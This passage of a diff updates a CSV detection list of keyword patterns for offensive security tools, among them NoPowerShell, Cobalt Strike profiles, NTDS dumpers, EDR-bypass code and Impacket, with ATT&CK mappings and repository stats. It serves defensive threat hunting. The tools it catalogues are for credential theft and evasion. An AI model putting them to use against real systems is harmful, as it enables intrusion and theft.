T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell_trunk.zip*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell32.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell64.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*normal/randomized.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*northdata-get-company-names *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*noseyparker report --datastore *","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" @@ -14161,25 +14324,25 @@ "*noseyparker-v*-universal-macos*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" "*noseyparker-v*-x86_64-unknown-linux-gnu*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" "*Nosql-Exploitation-Framework*","offensive_tool_keyword","Nosql-Exploitation-Framework","A FrameWork For NoSQL Scanning and Exploitation Framework","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Frameworks","https://github.com/torque59/Nosql-Exploitation-Framework","1","1","N/A","N/A","6","594","158","2023-09-26T11:50:30Z","2013-12-26T17:46:11Z" -"*NoSQLMap*","offensive_tool_keyword","NoSQLMap","Automated NoSQL database enumeration and web application exploitation tool.","T1190 - T1210 - T1506","TA0002 - TA0007 - TA0040","N/A","N/A","Frameworks","https://github.com/codingo/NoSQLMap","1","0","N/A","N/A","10","2532","568","2023-09-29T03:29:49Z","2013-09-24T15:01:30Z" +"*NoSQLMap*","offensive_tool_keyword","NoSQLMap","Automated NoSQL database enumeration and web application exploitation tool.","T1190 - T1210 - T1506","TA0002 - TA0007 - TA0040","N/A","N/A","Frameworks","https://github.com/codingo/NoSQLMap","1","0","N/A","N/A","10","2534","568","2023-09-29T03:29:49Z","2013-09-24T15:01:30Z" "*notepad FUZZ*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*notredamecheatstowin>*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*novelbfh.zip*","offensive_tool_keyword","novelbfh","Brute force Novell hacking tool -- Circa 1993","T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z" "*--noWAIT --noFUNC --donut --rehash n --silent -o /tmp/*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*nping *","offensive_tool_keyword","nping","Nping is an open source tool for network packet generation. response analysis and response time measurement. Nping can generate network packets for a wide range of protocols. allowing users full control over protocol headers. While Nping can be used as a simple ping utility to detect active hosts. it can also be used as a raw packet generator for network stack stress testing. ARP poisoning. Denial of Service attacks. route tracing. etc. Npings novel echo mode lets users see how packets change in transit between the source and destination hosts. Thats a great way to understand firewall rules. detect packet corruption. and more","T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://nmap.org/nping/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*nps whoami*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*nps whoami*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*nps whoami*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*nps whoami*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*nps_payload*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources.","T1059.007 - T1218.001 - T1027.002","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/trustedsec/nps_payload","1","1","N/A","N/A","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z" "*nps_payload.py*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z" "*nps_payload-master*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z" "*nrf24-scanner.py -l -v*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*nrpc.py*","offensive_tool_keyword","zerologon","Zerologon CVE exploitation","T1210 - T1072","TA0008","N/A","N/A","Exploitation tools","https://github.com/michaelpoznecki/zerologon","1","0","N/A","N/A","1","9","4","2020-09-15T16:31:59Z","2020-09-15T05:32:24Z" "*nselib/data/passwords.lst*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ntcreatethread.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*ntcreatethread.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ntcreatethread.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ntcreatethread.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*NtCreateUserProcessShellcode*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" -"*ntdissector -*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" -"*ntdissector-main*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*ntdissector -*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*ntdissector-main*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" "*Ntdll_SusProcess.*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*NTDLLReflection-main*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*NtdllUnpatcher.cpp*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" @@ -14190,16 +14353,16 @@ "*NtdllUnpatcher.sln*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*NtdllUnpatcher_Injector*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*NtdllUnpatcher-master*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" -"*ntds/ntds.py*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" -"*ntds_grabber.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*ntds/ntds.py*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*ntds_grabber.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*ntdsdump.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" -"*NTDSgrab.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ntfs-read.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*NTDSgrab.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ntfs-read.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation 